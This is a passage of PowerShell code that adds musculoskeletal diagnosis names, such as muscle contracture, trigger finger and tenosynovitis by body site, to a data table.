$DiagnosisList.Rows.Add("Other ossification of muscle, multiple sites","Other ossification of muscle, multiple sites") + $null = $DiagnosisList.Rows.Add("Calcification and ossification of muscle, unspecified","Calcification and ossification of muscle, unspecified") + $null = $DiagnosisList.Rows.Add("Separation of muscle (nontraumatic)","Separation of muscle (nontraumatic), unspecified site") + $null = $DiagnosisList.Rows.Add("Separation of muscle (nontraumatic), shoulder","Separation of muscle (nontraumatic), right shoulder") + $null = $DiagnosisList.Rows.Add("Separation of muscle (nontraumatic), shoulder","Separation of muscle (nontraumatic), left shoulder") + $null = $DiagnosisList.Rows.Add("Separation of muscle (nontraumatic), shoulder","Separation of muscle (nontraumatic), unspecified shoulder") + $null = $DiagnosisList.Rows.Add("Separation of muscle (nontraumatic), upper arm","Separation of muscle (nontraumatic), right upper arm") + $null = $DiagnosisList.Rows.Add("Separation of muscle (nontraumatic), upper arm","Separation of muscle (nontraumatic), left upper arm") + $null = $DiagnosisList.Rows.Add("Separation of muscle (nontraumatic), upper arm","Separation of muscle (nontraumatic), unspecified upper arm") + $null = $DiagnosisList.Rows.Add("Separation of muscle (nontraumatic), forearm","Separation of muscle (nontraumatic), right forearm") + $null = $DiagnosisList.Rows.Add("Separation of muscle (nontraumatic), forearm","Separation of muscle (nontraumatic), left forearm") + $null = $DiagnosisList.Rows.Add("Separation of muscle (nontraumatic), forearm","Separation of muscle (nontraumatic), unspecified forearm") + $null = $DiagnosisList.Rows.Add("Separation of muscle (nontraumatic), hand","Separation of muscle (nontraumatic), right hand") + $null = $DiagnosisList.Rows.Add("Separation of muscle (nontraumatic), hand","Separation of muscle (nontraumatic), left hand") + $null = $DiagnosisList.Rows.Add("Separation of muscle (nontraumatic), hand","Separation of muscle (nontraumatic), unspecified hand") + $null = $DiagnosisList.Rows.Add("Separation of muscle (nontraumatic), thigh","Separation of muscle (nontraumatic), right thigh") + $null = $DiagnosisList.Rows.Add("Separation of muscle (nontraumatic), thigh","Separation of muscle (nontraumatic), left thigh") + $null = $DiagnosisList.Rows.Add("Separation of muscle (nontraumatic), thigh","Separation of muscle (nontraumatic), unspecified thigh") + $null = $DiagnosisList.Rows.Add("Separation of muscle (nontraumatic), lower leg","Separation of muscle (nontraumatic), right lower leg") + $null = $DiagnosisList.Rows.Add("Separation of muscle (nontraumatic), lower leg","Separation of muscle (nontraumatic), left lower leg") + $null = $DiagnosisList.Rows.Add("Separation of muscle (nontraumatic), lower leg","Separation of muscle (nontraumatic), unspecified lower leg") + $null = $DiagnosisList.Rows.Add("Separation of muscle (nontraumatic), ankle and foot","Separation of muscle (nontraumatic), right ankle and foot") + $null = $DiagnosisList.Rows.Add("Separation of muscle (nontraumatic), ankle and foot","Separation of muscle (nontraumatic), left ankle and foot") + $null = $DiagnosisList.Rows.Add("Separation of muscle (nontraumatic), ankle and foot","Separation of muscle (nontraumatic), unspecified ankle and foot") + $null = $DiagnosisList.Rows.Add("Separation of muscle (nontraumatic), other site","Separation of muscle (nontraumatic), other site") + $null = $DiagnosisList.Rows.Add("Other rupture of muscle (nontraumatic)","Other rupture of muscle (nontraumatic), unspecified site") + $null = $DiagnosisList.Rows.Add("Other rupture of muscle (nontraumatic), shoulder","Other rupture of muscle (nontraumatic), right shoulder") + $null = $DiagnosisList.Rows.Add("Other rupture of muscle (nontraumatic), shoulder","Other rupture of muscle (nontraumatic), left shoulder") + $null = $DiagnosisList.Rows.Add("Other rupture of muscle (nontraumatic), shoulder","Other rupture of muscle (nontraumatic), unspecified shoulder") + $null = $DiagnosisList.Rows.Add("Other rupture of muscle (nontraumatic), upper arm","Other rupture of muscle (nontraumatic), right upper arm") + $null = $DiagnosisList.Rows.Add("Other rupture of muscle (nontraumatic), upper arm","Other rupture of muscle (nontraumatic), left upper arm") + $null = $DiagnosisList.Rows.Add("Other rupture of muscle (nontraumatic), upper arm","Other rupture of muscle (nontraumatic), unspecified upper arm") + $null = $DiagnosisList.Rows.Add("Other rupture of muscle (nontraumatic), forearm","Other rupture of muscle (nontraumatic), right forearm") + $null = $DiagnosisList.Rows.Add("Other rupture of muscle (nontraumatic), forearm","Other rupture of muscle (nontraumatic), left forearm") + $null = $DiagnosisList.Rows.Add("Other rupture of muscle (nontraumatic), forearm","Other rupture of muscle (nontraumatic), unspecified forearm") + $null = $DiagnosisList.Rows.Add("Other rupture of muscle (nontraumatic), hand","Other rupture of muscle (nontraumatic), right hand") + $null = $DiagnosisList.Rows.Add("Other rupture of muscle (nontraumatic), hand","Other rupture of muscle (nontraumatic), left hand") + $null = $DiagnosisList.Rows.Add("Other rupture of muscle (nontraumatic), hand","Other rupture of muscle (nontraumatic), unspecified hand") + $null = $DiagnosisList.Rows.Add("Other rupture of muscle (nontraumatic), thigh","Other rupture of muscle (nontraumatic), right thigh") + $null = $DiagnosisList.Rows.Add("Other rupture of muscle (nontraumatic), thigh","Other rupture of muscle (nontraumatic), left thigh") + $null = $DiagnosisList.Rows.Add("Other rupture of muscle (nontraumatic), thigh","Other rupture of muscle (nontraumatic), unspecified thigh") + $null = $DiagnosisList.Rows.Add("Other rupture of muscle (nontraumatic), lower leg","Other rupture of muscle (nontraumatic), right lower leg") + $null = $DiagnosisList.Rows.Add("Other rupture of muscle (nontraumatic), lower leg","Other rupture of muscle (nontraumatic), left lower leg") + $null = $DiagnosisList.Rows.Add("Other rupture of muscle (nontraumatic), lower leg","Other rupture of muscle (nontraumatic), unspecified lower leg") + $null = $DiagnosisList.Rows.Add("Other rupture of muscle (nontraumatic), ankle and foot","Other rupture of muscle (nontraumatic), right ankle and foot") + $null = $DiagnosisList.Rows.Add("Other rupture of muscle (nontraumatic), ankle and foot","Other rupture of muscle (nontraumatic), left ankle and foot") + $null = $DiagnosisList.Rows.Add("Other rupture of muscle (nontraumatic), ankle and foot","Other rupture of muscle (nontraumatic), unspecified ankle and foot") + $null = $DiagnosisList.Rows.Add("Other rupture of muscle (nontraumatic), other site","Other rupture of muscle (nontraumatic), other site") + $null = $DiagnosisList.Rows.Add("Nontraumatic ischemic infarction of muscle","Nontraumatic ischemic infarction of muscle, unspecified site") + $null = $DiagnosisList.Rows.Add("Nontraumatic ischemic infarction of muscle, shoulder","Nontraumatic ischemic infarction of muscle, right shoulder") + $null = $DiagnosisList.Rows.Add("Nontraumatic ischemic infarction of muscle, shoulder","Nontraumatic ischemic infarction of muscle, left shoulder") + $null = $DiagnosisList.Rows.Add("Nontraumatic ischemic infarction of muscle, shoulder","Nontraumatic ischemic infarction of muscle, unspecified shoulder") + $null = $DiagnosisList.Rows.Add("Nontraumatic ischemic infarction of muscle, upper arm","Nontraumatic ischemic infarction of muscle, right upper arm") + $null = $DiagnosisList.Rows.Add("Nontraumatic ischemic infarction of muscle, upper arm","Nontraumatic ischemic infarction of muscle, left upper arm") + $null = $DiagnosisList.Rows.Add("Nontraumatic ischemic infarction of muscle, upper arm","Nontraumatic ischemic infarction of muscle, unspecified upper arm") + $null = $DiagnosisList.Rows.Add("Nontraumatic ischemic infarction of muscle, forearm","Nontraumatic ischemic infarction of muscle, right forearm") + $null = $DiagnosisList.Rows.Add("Nontraumatic ischemic infarction of muscle, forearm","Nontraumatic ischemic infarction of muscle, left forearm") + $null = $DiagnosisList.Rows.Add("Nontraumatic ischemic infarction of muscle, forearm","Nontraumatic ischemic infarction of muscle, unspecified forearm") + $null = $DiagnosisList.Rows.Add("Nontraumatic ischemic infarction of muscle, hand","Nontraumatic ischemic infarction of muscle, right hand") + $null = $DiagnosisList.Rows.Add("Nontraumatic ischemic infarction of muscle, hand","Nontraumatic ischemic infarction of muscle, left hand") + $null = $DiagnosisList.Rows.Add("Nontraumatic ischemic infarction of muscle, hand","Nontraumatic ischemic infarction of muscle, unspecified hand") + $null = $DiagnosisList.Rows.Add("Nontraumatic ischemic infarction of muscle, thigh","Nontraumatic ischemic infarction of muscle, right thigh") + $null = $DiagnosisList.Rows.Add("Nontraumatic ischemic infarction of muscle, thigh","Nontraumatic ischemic infarction of muscle, left thigh") + $null = $DiagnosisList.Rows.Add("Nontraumatic ischemic infarction of muscle, thigh","Nontraumatic ischemic infarction of muscle, unspecified thigh") + $null = $DiagnosisList.Rows.Add("Nontraumatic ischemic infarction of muscle, lower leg","Nontraumatic ischemic infarction of muscle, right lower leg") + $null = $DiagnosisList.Rows.Add("Nontraumatic ischemic infarction of muscle, lower leg","Nontraumatic ischemic infarction of muscle, left lower leg") + $null = $DiagnosisList.Rows.Add("Nontraumatic ischemic infarction of muscle, lower leg","Nontraumatic ischemic infarction of muscle, unspecified lower leg") + $null = $DiagnosisList.Rows.Add("Nontraumatic ischemic infarction of muscle, ankle and foot","Nontraumatic ischemic infarction of muscle, right ankle and foot") + $null = $DiagnosisList.Rows.Add("Nontraumatic ischemic infarction of muscle, ankle and foot","Nontraumatic ischemic infarction of muscle, left ankle and foot") + $null = $DiagnosisList.Rows.Add("Nontraumatic ischemic infarction of muscle, ankle and foot","Nontraumatic ischemic infarction of muscle, unspecified ankle and foot") + $null = $DiagnosisList.Rows.Add("Nontraumatic ischemic infarction of muscle, other site","Nontraumatic ischemic infarction of muscle, other site") + $null = $DiagnosisList.Rows.Add("Immobility syndrome (paraplegic)","Immobility syndrome (paraplegic)") + $null = $DiagnosisList.Rows.Add("Contracture of muscle","Contracture of muscle, unspecified site") + $null = $DiagnosisList.Rows.Add("Contracture of muscle, shoulder","Contracture of muscle, right shoulder") + $null = $DiagnosisList.Rows.Add("Contracture of muscle, shoulder","Contracture of muscle, left shoulder") + $null = $DiagnosisList.Rows.Add("Contracture of muscle, shoulder","Contracture of muscle, unspecified shoulder") + $null = $DiagnosisList.Rows.Add("Contracture of muscle, upper arm","Contracture of muscle, right upper arm") + $null = $DiagnosisList.Rows.Add("Contracture of muscle, upper arm","Contracture of muscle, left upper arm") + $null = $DiagnosisList.Rows.Add("Contracture of muscle, upper arm","Contracture of muscle, unspecified upper arm") + $null = $DiagnosisList.Rows.Add("Contracture of muscle, forearm","Contracture of muscle, right forearm") + $null = $DiagnosisList.Rows.Add("Contracture of muscle, forearm","Contracture of muscle, left forearm") + $null = $DiagnosisList.Rows.Add("Contracture of muscle, forearm","Contracture of muscle, unspecified forearm") + $null = $DiagnosisList.Rows.Add("Contracture of muscle, hand","Contracture of muscle, right hand") + $null = $DiagnosisList.Rows.Add("Contracture of muscle, hand","Contracture of muscle, left hand") + $null = $DiagnosisList.Rows.Add("Contracture of muscle, hand","Contracture of muscle, unspecified hand") + $null = $DiagnosisList.Rows.Add("Contracture of muscle, thigh","Contracture of muscle, right thigh") + $null = $DiagnosisList.Rows.Add("Contracture of muscle, thigh","Contracture of muscle, left thigh") + $null = $DiagnosisList.Rows.Add("Contracture of muscle, thigh","Contracture of muscle, unspecified thigh") + $null = $DiagnosisList.Rows.Add("Contracture of muscle, lower leg","Contracture of muscle, right lower leg") + $null = $DiagnosisList.Rows.Add("Contracture of muscle, lower leg","Contracture of muscle, left lower leg") + $null = $DiagnosisList.Rows.Add("Contracture of muscle, lower leg","Contracture of muscle, unspecified lower leg") + $null = $DiagnosisList.Rows.Add("Contracture of muscle, ankle and foot","Contracture of muscle, right ankle and foot") + $null = $DiagnosisList.Rows.Add("Contracture of muscle, ankle and foot","Contracture of muscle, left ankle and foot") + $null = $DiagnosisList.Rows.Add("Contracture of muscle, ankle and foot","Contracture of muscle, unspecified ankle and foot") + $null = $DiagnosisList.Rows.Add("Contracture of muscle, other site","Contracture of muscle, other site") + $null = $DiagnosisList.Rows.Add("Contracture of muscle, multiple sites","Contracture of muscle, multiple sites") + $null = $DiagnosisList.Rows.Add("Muscle wasting and atrophy, not elsewhere classified","Muscle wasting and atrophy, not elsewhere classified, unspecified site") + $null = $DiagnosisList.Rows.Add("Muscle wasting and atrophy, not elsewhere classified, shoulder","Muscle wasting and atrophy, not elsewhere classified, right shoulder") + $null = $DiagnosisList.Rows.Add("Muscle wasting and atrophy, not elsewhere classified, shoulder","Muscle wasting and atrophy, not elsewhere classified, left shoulder") + $null = $DiagnosisList.Rows.Add("Muscle wasting and atrophy, not elsewhere classified, shoulder","Muscle wasting and atrophy, not elsewhere classified, unspecified shoulder") + $null = $DiagnosisList.Rows.Add("Muscle wasting and atrophy, not elsewhere classified, upper arm","Muscle wasting and atrophy, not elsewhere classified, right upper arm") + $null = $DiagnosisList.Rows.Add("Muscle wasting and atrophy, not elsewhere classified, upper arm","Muscle wasting and atrophy, not elsewhere classified, left upper arm") + $null = $DiagnosisList.Rows.Add("Muscle wasting and atrophy, not elsewhere classified, upper arm","Muscle wasting and atrophy, not elsewhere classified, unspecified upper arm") + $null = $DiagnosisList.Rows.Add("Muscle wasting and atrophy, not elsewhere classified, forearm","Muscle wasting and atrophy, not elsewhere classified, right forearm") + $null = $DiagnosisList.Rows.Add("Muscle wasting and atrophy, not elsewhere classified, forearm","Muscle wasting and atrophy, not elsewhere classified, left forearm") + $null = $DiagnosisList.Rows.Add("Muscle wasting and atrophy, not elsewhere classified, forearm","Muscle wasting and atrophy, not elsewhere classified, unspecified forearm") + $null = $DiagnosisList.Rows.Add("Muscle wasting and atrophy, not elsewhere classified, hand","Muscle wasting and atrophy, not elsewhere classified, right hand") + $null = $DiagnosisList.Rows.Add("Muscle wasting and atrophy, not elsewhere classified, hand","Muscle wasting and atrophy, not elsewhere classified, left hand") + $null = $DiagnosisList.Rows.Add("Muscle wasting and atrophy, not elsewhere classified, hand","Muscle wasting and atrophy, not elsewhere classified, unspecified hand") + $null = $DiagnosisList.Rows.Add("Muscle wasting and atrophy, not elsewhere classified, thigh","Muscle wasting and atrophy, not elsewhere classified, right thigh") + $null = $DiagnosisList.Rows.Add("Muscle wasting and atrophy, not elsewhere classified, thigh","Muscle wasting and atrophy, not elsewhere classified, left thigh") + $null = $DiagnosisList.Rows.Add("Muscle wasting and atrophy, not elsewhere classified, thigh","Muscle wasting and atrophy, not elsewhere classified, unspecified thigh") + $null = $DiagnosisList.Rows.Add("Muscle wasting and atrophy, not elsewhere classified, lower leg","Muscle wasting and atrophy, not elsewhere classified, right lower leg") + $null = $DiagnosisList.Rows.Add("Muscle wasting and atrophy, not elsewhere classified, lower leg","Muscle wasting and atrophy, not elsewhere classified, left lower leg") + $null = $DiagnosisList.Rows.Add("Muscle wasting and atrophy, not elsewhere classified, lower leg","Muscle wasting and atrophy, not elsewhere classified, unspecified lower leg") + $null = $DiagnosisList.Rows.Add("Muscle wasting and atrophy, not elsewhere classified, ankle and foot","Muscle wasting and atrophy, not elsewhere classified, right ankle and foot") + $null = $DiagnosisList.Rows.Add("Muscle wasting and atrophy, not elsewhere classified, ankle and foot","Muscle wasting and atrophy, not elsewhere classified, left ankle and foot") + $null = $DiagnosisList.Rows.Add("Muscle wasting and atrophy, not elsewhere classified, ankle and foot","Muscle wasting and atrophy, not elsewhere classified, unspecified ankle and foot") + $null = $DiagnosisList.Rows.Add("Muscle wasting and atrophy, not elsewhere classified, other site","Muscle wasting and atrophy, not elsewhere classified, other site") + $null = $DiagnosisList.Rows.Add("Muscle wasting and atrophy, not elsewhere classified, multiple sites","Muscle wasting and atrophy, not elsewhere classified, multiple sites") + $null = $DiagnosisList.Rows.Add("Other specified disorders of muscle","Muscle weakness (generalized)") + $null = $DiagnosisList.Rows.Add("Other specified disorders of muscle","Rhabdomyolysis") + $null = $DiagnosisList.Rows.Add("Muscle spasm","Muscle spasm of back") + $null = $DiagnosisList.Rows.Add("Muscle spasm","Muscle spasm of calf") + $null = $DiagnosisList.Rows.Add("Muscle spasm","Other muscle spasm") + $null = $DiagnosisList.Rows.Add("Sarcopenia","Sarcopenia") + $null = $DiagnosisList.Rows.Add("Other specified disorders of muscle","Other specified disorders of muscle") + $null = $DiagnosisList.Rows.Add("Disorder of muscle, unspecified","Disorder of muscle, unspecified") + $null = $DiagnosisList.Rows.Add("Disorders of muscle in diseases classified elsewhere","Disorders of muscle in diseases classified elsewhere, unspecified site") + $null = $DiagnosisList.Rows.Add("Disorders of muscle in diseases classified elsewhere, shoulder","Disorders of muscle in diseases classified elsewhere, right shoulder") + $null = $DiagnosisList.Rows.Add("Disorders of muscle in diseases classified elsewhere, shoulder","Disorders of muscle in diseases classified elsewhere, left shoulder") + $null = $DiagnosisList.Rows.Add("Disorders of muscle in diseases classified elsewhere, shoulder","Disorders of muscle in diseases classified elsewhere, unspecified shoulder") + $null = $DiagnosisList.Rows.Add("Disorders of muscle in diseases classified elsewhere, upper arm","Disorders of muscle in diseases classified elsewhere, right upper arm") + $null = $DiagnosisList.Rows.Add("Disorders of muscle in diseases classified elsewhere, upper arm","Disorders of muscle in diseases classified elsewhere, left upper arm") + $null = $DiagnosisList.Rows.Add("Disorders of muscle in diseases classified elsewhere, upper arm","Disorders of muscle in diseases classified elsewhere, unspecified upper arm") + $null = $DiagnosisList.Rows.Add("Disorders of muscle in diseases classified elsewhere, forearm","Disorders of muscle in diseases classified elsewhere, right forearm") + $null = $DiagnosisList.Rows.Add("Disorders of muscle in diseases classified elsewhere, forearm","Disorders of muscle in diseases classified elsewhere, left forearm") + $null = $DiagnosisList.Rows.Add("Disorders of muscle in diseases classified elsewhere, forearm","Disorders of muscle in diseases classified elsewhere, unspecified forearm") + $null = $DiagnosisList.Rows.Add("Disorders of muscle in diseases classified elsewhere, hand","Disorders of muscle in diseases classified elsewhere, right hand") + $null = $DiagnosisList.Rows.Add("Disorders of muscle in diseases classified elsewhere, hand","Disorders of muscle in diseases classified elsewhere, left hand") + $null = $DiagnosisList.Rows.Add("Disorders of muscle in diseases classified elsewhere, hand","Disorders of muscle in diseases classified elsewhere, unspecified hand") + $null = $DiagnosisList.Rows.Add("Disorders of muscle in diseases classified elsewhere, thigh","Disorders of muscle in diseases classified elsewhere, right thigh") + $null = $DiagnosisList.Rows.Add("Disorders of muscle in diseases classified elsewhere, thigh","Disorders of muscle in diseases classified elsewhere, left thigh") + $null = $DiagnosisList.Rows.Add("Disorders of muscle in diseases classified elsewhere, thigh","Disorders of muscle in diseases classified elsewhere, unspecified thigh") + $null = $DiagnosisList.Rows.Add("Disorders of muscle in diseases classified elsewhere, lower leg","Disorders of muscle in diseases classified elsewhere, right lower leg") + $null = $DiagnosisList.Rows.Add("Disorders of muscle in diseases classified elsewhere, lower leg","Disorders of muscle in diseases classified elsewhere, left lower leg") + $null = $DiagnosisList.Rows.Add("Disorders of muscle in diseases classified elsewhere, lower leg","Disorders of muscle in diseases classified elsewhere, unspecified lower leg") + $null = $DiagnosisList.Rows.Add("Disorders of muscle in diseases classified elsewhere, ankle and foot","Disorders of muscle in diseases classified elsewhere, right ankle and foot") + $null = $DiagnosisList.Rows.Add("Disorders of muscle in diseases classified elsewhere, ankle and foot","Disorders of muscle in diseases classified elsewhere, left ankle and foot") + $null = $DiagnosisList.Rows.Add("Disorders of muscle in diseases classified elsewhere, ankle and foot","Disorders of muscle in diseases classified elsewhere, unspecified ankle and foot") + $null = $DiagnosisList.Rows.Add("Disorders of muscle in diseases classified elsewhere, other site","Disorders of muscle in diseases classified elsewhere, other site") + $null = $DiagnosisList.Rows.Add("Disorders of muscle in diseases classified elsewhere, multiple sites","Disorders of muscle in diseases classified elsewhere, multiple sites") + $null = $DiagnosisList.Rows.Add("Abscess of tendon sheath","Abscess of tendon sheath, unspecified site") + $null = $DiagnosisList.Rows.Add("Abscess of tendon sheath, shoulder","Abscess of tendon sheath, right shoulder") + $null = $DiagnosisList.Rows.Add("Abscess of tendon sheath, shoulder","Abscess of tendon sheath, left shoulder") + $null = $DiagnosisList.Rows.Add("Abscess of tendon sheath, shoulder","Abscess of tendon sheath, unspecified shoulder") + $null = $DiagnosisList.Rows.Add("Abscess of tendon sheath, upper arm","Abscess of tendon sheath, right upper arm") + $null = $DiagnosisList.Rows.Add("Abscess of tendon sheath, upper arm","Abscess of tendon sheath, left upper arm") + $null = $DiagnosisList.Rows.Add("Abscess of tendon sheath, upper arm","Abscess of tendon sheath, unspecified upper arm") + $null = $DiagnosisList.Rows.Add("Abscess of tendon sheath, forearm","Abscess of tendon sheath, right forearm") + $null = $DiagnosisList.Rows.Add("Abscess of tendon sheath, forearm","Abscess of tendon sheath, left forearm") + $null = $DiagnosisList.Rows.Add("Abscess of tendon sheath, forearm","Abscess of tendon sheath, unspecified forearm") + $null = $DiagnosisList.Rows.Add("Abscess of tendon sheath, hand","Abscess of tendon sheath, right hand") + $null = $DiagnosisList.Rows.Add("Abscess of tendon sheath, hand","Abscess of tendon sheath, left hand") + $null = $DiagnosisList.Rows.Add("Abscess of tendon sheath, hand","Abscess of tendon sheath, unspecified hand") + $null = $DiagnosisList.Rows.Add("Abscess of tendon sheath, thigh","Abscess of tendon sheath, right thigh") + $null = $DiagnosisList.Rows.Add("Abscess of tendon sheath, thigh","Abscess of tendon sheath, left thigh") + $null = $DiagnosisList.Rows.Add("Abscess of tendon sheath, thigh","Abscess of tendon sheath, unspecified thigh") + $null = $DiagnosisList.Rows.Add("Abscess of tendon sheath, lower leg","Abscess of tendon sheath, right lower leg") + $null = $DiagnosisList.Rows.Add("Abscess of tendon sheath, lower leg","Abscess of tendon sheath, left lower leg") + $null = $DiagnosisList.Rows.Add("Abscess of tendon sheath, lower leg","Abscess of tendon sheath, unspecified lower leg") + $null = $DiagnosisList.Rows.Add("Abscess of tendon sheath, ankle and foot","Abscess of tendon sheath, right ankle and foot") + $null = $DiagnosisList.Rows.Add("Abscess of tendon sheath, ankle and foot","Abscess of tendon sheath, left ankle and foot") + $null = $DiagnosisList.Rows.Add("Abscess of tendon sheath, ankle and foot","Abscess of tendon sheath, unspecified ankle and foot") + $null = $DiagnosisList.Rows.Add("Abscess of tendon sheath, other site","Abscess of tendon sheath, other site") + $null = $DiagnosisList.Rows.Add("Other infective (teno)synovitis","Other infective (teno)synovitis, unspecified site") + $null = $DiagnosisList.Rows.Add("Other infective (teno)synovitis, shoulder","Other infective (teno)synovitis, right shoulder") + $null = $DiagnosisList.Rows.Add("Other infective (teno)synovitis, shoulder","Other infective (teno)synovitis, left shoulder") + $null = $DiagnosisList.Rows.Add("Other infective (teno)synovitis, shoulder","Other infective (teno)synovitis, unspecified shoulder") + $null = $DiagnosisList.Rows.Add("Other infective (teno)synovitis, elbow","Other infective (teno)synovitis, right elbow") + $null = $DiagnosisList.Rows.Add("Other infective (teno)synovitis, elbow","Other infective (teno)synovitis, left elbow") + $null = $DiagnosisList.Rows.Add("Other infective (teno)synovitis, elbow","Other infective (teno)synovitis, unspecified elbow") + $null = $DiagnosisList.Rows.Add("Other infective (teno)synovitis, wrist","Other infective (teno)synovitis, right wrist") + $null = $DiagnosisList.Rows.Add("Other infective (teno)synovitis, wrist","Other infective (teno)synovitis, left wrist") + $null = $DiagnosisList.Rows.Add("Other infective (teno)synovitis, wrist","Other infective (teno)synovitis, unspecified wrist") + $null = $DiagnosisList.Rows.Add("Other infective (teno)synovitis, hand","Other infective (teno)synovitis, right hand") + $null = $DiagnosisList.Rows.Add("Other infective (teno)synovitis, hand","Other infective (teno)synovitis, left hand") + $null = $DiagnosisList.Rows.Add("Other infective (teno)synovitis, hand","Other infective (teno)synovitis, unspecified hand") + $null = $DiagnosisList.Rows.Add("Other infective (teno)synovitis, hip","Other infective (teno)synovitis, right hip") + $null = $DiagnosisList.Rows.Add("Other infective (teno)synovitis, hip","Other infective (teno)synovitis, left hip") + $null = $DiagnosisList.Rows.Add("Other infective (teno)synovitis, hip","Other infective (teno)synovitis, unspecified hip") + $null = $DiagnosisList.Rows.Add("Other infective (teno)synovitis, knee","Other infective (teno)synovitis, right knee") + $null = $DiagnosisList.Rows.Add("Other infective (teno)synovitis, knee","Other infective (teno)synovitis, left knee") + $null = $DiagnosisList.Rows.Add("Other infective (teno)synovitis, knee","Other infective (teno)synovitis, unspecified knee") + $null = $DiagnosisList.Rows.Add("Other infective (teno)synovitis, ankle and foot","Other infective (teno)synovitis, right ankle and foot") + $null = $DiagnosisList.Rows.Add("Other infective (teno)synovitis, ankle and foot","Other infective (teno)synovitis, left ankle and foot") + $null = $DiagnosisList.Rows.Add("Other infective (teno)synovitis, ankle and foot","Other infective (teno)synovitis, unspecified ankle and foot") + $null = $DiagnosisList.Rows.Add("Other infective (teno)synovitis, other site","Other infective (teno)synovitis, other site") + $null = $DiagnosisList.Rows.Add("Other infective (teno)synovitis, multiple sites","Other infective (teno)synovitis, multiple sites") + $null = $DiagnosisList.Rows.Add("Calcific tendinitis","Calcific tendinitis, unspecified site") + $null = $DiagnosisList.Rows.Add("Calcific tendinitis, upper arm","Calcific tendinitis, right upper arm") + $null = $DiagnosisList.Rows.Add("Calcific tendinitis, upper arm","Calcific tendinitis, left upper arm") + $null = $DiagnosisList.Rows.Add("Calcific tendinitis, upper arm","Calcific tendinitis, unspecified upper arm") + $null = $DiagnosisList.Rows.Add("Calcific tendinitis, forearm","Calcific tendinitis, right forearm") + $null = $DiagnosisList.Rows.Add("Calcific tendinitis, forearm","Calcific tendinitis, left forearm") + $null = $DiagnosisList.Rows.Add("Calcific tendinitis, forearm","Calcific tendinitis, unspecified forearm") + $null = $DiagnosisList.Rows.Add("Calcific tendinitis, hand","Calcific tendinitis, right hand") + $null = $DiagnosisList.Rows.Add("Calcific tendinitis, hand","Calcific tendinitis, left hand") + $null = $DiagnosisList.Rows.Add("Calcific tendinitis, hand","Calcific tendinitis, unspecified hand") + $null = $DiagnosisList.Rows.Add("Calcific tendinitis, thigh","Calcific tendinitis, right thigh") + $null = $DiagnosisList.Rows.Add("Calcific tendinitis, thigh","Calcific tendinitis, left thigh") + $null = $DiagnosisList.Rows.Add("Calcific tendinitis, thigh","Calcific tendinitis, unspecified thigh") + $null = $DiagnosisList.Rows.Add("Calcific tendinitis, lower leg","Calcific tendinitis, right lower leg") + $null = $DiagnosisList.Rows.Add("Calcific tendinitis, lower leg","Calcific tendinitis, left lower leg") + $null = $DiagnosisList.Rows.Add("Calcific tendinitis, lower leg","Calcific tendinitis, unspecified lower leg") + $null = $DiagnosisList.Rows.Add("Calcific tendinitis, ankle and foot","Calcific tendinitis, right ankle and foot") + $null = $DiagnosisList.Rows.Add("Calcific tendinitis, ankle and foot","Calcific tendinitis, left ankle and foot") + $null = $DiagnosisList.Rows.Add("Calcific tendinitis, ankle and foot","Calcific tendinitis, unspecified ankle and foot") + $null = $DiagnosisList.Rows.Add("Calcific tendinitis, other site","Calcific tendinitis, other site") + $null = $DiagnosisList.Rows.Add("Calcific tendinitis, multiple sites","Calcific tendinitis, multiple sites") + $null = $DiagnosisList.Rows.Add("Trigger finger","Trigger finger, unspecified finger") + $null = $DiagnosisList.Rows.Add("Trigger thumb","Trigger thumb, right thumb") + $null = $DiagnosisList.Rows.Add("Trigger thumb","Trigger thumb, left thumb") + $null = $DiagnosisList.Rows.Add("Trigger thumb","Trigger thumb, unspecified thumb") + $null = $DiagnosisList.Rows.Add("Trigger finger, index finger","Trigger finger, right index finger") + $null = $DiagnosisList.Rows.Add("Trigger finger, index finger","Trigger finger, left index finger") + $null = $DiagnosisList.Rows.Add("Trigger finger, index finger","Trigger finger, unspecified index finger") + $null = $DiagnosisList.Rows.Add("Trigger finger, middle finger","Trigger finger, right middle finger") + $null = $DiagnosisList.Rows.Add("Trigger finger, middle finger","Trigger finger, left middle finger") + $null = $DiagnosisList.Rows.Add("Trigger finger, middle finger","Trigger finger, unspecified middle finger") + $null = $DiagnosisList.Rows.Add("Trigger finger, ring finger","Trigger finger, right ring finger") + $null = $DiagnosisList.Rows.Add("Trigger finger, ring finger","Trigger finger, left ring finger") + $null = $DiagnosisList.Rows.Add("Trigger finger, ring finger","Trigger finger, unspecified ring finger") + $null = $DiagnosisList.Rows.Add("Trigger finger, little finger","Trigger finger, right little finger") + $null = $DiagnosisList.Rows.Add("Trigger finger, little finger","Trigger finger, left little finger") + $null = $DiagnosisList.Rows.Add("Trigger finger, little finger","Trigger finger, unspecified little finger") + $null = $DiagnosisList.Rows.Add("Radial styloid tenosynovitis [de Quervain]","Radial styloid tenosynovitis [de Quervain]") + $null = $DiagnosisList.Rows.Add("Other synovitis and tenosynovitis","Other synovitis and tenosynovitis, unspecified site") + $null = $DiagnosisList.Rows.Add("Other synovitis and tenosynovitis, shoulder","Other synovitis and tenosynovitis, right shoulder") + $null = $DiagnosisList.Rows.Add("Other synovitis and tenosynovitis, shoulder","Other synovitis and tenosynovitis, left shoulder") + $null = $DiagnosisList.Rows.Add("Other synovitis and tenosynovitis, shoulder","Other synovitis and tenosynovitis, unspecified shoulder") + $null = $DiagnosisList.Rows.Add("Other synovitis and tenosynovitis, upper arm","Other synovitis and tenosynovitis, right upper arm") + $null = $DiagnosisList.Rows.Add("Other synovitis and tenosynovitis, upper arm","Other synovitis and tenosynovitis, left upper arm") + $null = $DiagnosisList.Rows.Add("Other synovitis and tenosynovitis, upper arm","Other synovitis and tenosynovitis, unspecified upper arm") + $null = $DiagnosisList.Rows.Add("Other synovitis and tenosynovitis, forearm","Other synovitis and tenosynovitis, right forearm") + $null = $DiagnosisList.Rows.Add("Other synovitis and tenosynovitis, forearm","Other synovitis and tenosynovitis, left forearm") + $null = $DiagnosisList.Rows.Add("Other synovitis and tenosynovitis, forearm","Other synovitis and tenosynovitis, unspecified forearm") + $null = $DiagnosisList.Rows.Add("Other synovitis and tenosynovitis, hand","Other synovitis and tenosynovitis, right hand") + $null = $DiagnosisList.Rows.Add("Other synovitis and tenosynovitis, hand","Other synovitis and tenosynovitis, left hand") + $null = $DiagnosisList.Rows.Add("Other synovitis and tenosynovitis, hand","Other synovitis and tenosynovitis, unspecified hand") + $null = $DiagnosisList.Rows.Add("Other synovitis and tenosynovitis, thigh","Other synovitis and tenosynovitis, right thigh") + $null = $DiagnosisList.Rows.Add("Other synovitis and tenosynovitis, thigh","Other synovitis and tenosynovitis, left thigh") + $null = 